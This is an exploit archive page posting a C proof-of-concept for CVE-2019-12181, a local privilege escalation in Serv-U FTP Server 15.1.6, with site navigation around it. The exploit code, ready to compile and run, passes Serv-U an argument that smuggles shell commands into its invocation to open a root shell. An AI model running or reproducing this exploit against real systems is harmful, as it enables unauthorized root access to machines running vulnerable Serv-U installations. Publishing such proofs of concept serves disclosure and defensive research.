Serv-U FTP Server 15.1.6 Privilege Escalation

Serv-U FTP Server 15.1.6 Privilege Escalation: Posted Jun 18, 2019; Authored by Guy Levin; Serv-U FTP Server version 15.1.6 suffers from a local privilege escalation vulnerability.; tags | exploit, local; advisories | CVE-2019-12181; SHA-256 | 25bff5ba2be3edf9ed986bd39f8d9bd1ae0e31fb8515abafc5e1c68e32374b5b; Download | Favorite | View

Serv-U FTP Server 15.1.6 Privilege Escalation

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{       
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

Serv-U FTP Server 15.1.6 Privilege Escalation

Serv-U FTP Server 15.1.6 Privilege Escalation

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Serv-U FTP Server 15.1.6 Privilege Escalation

Share This

Serv-U FTP Server 15.1.6 Privilege Escalation

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems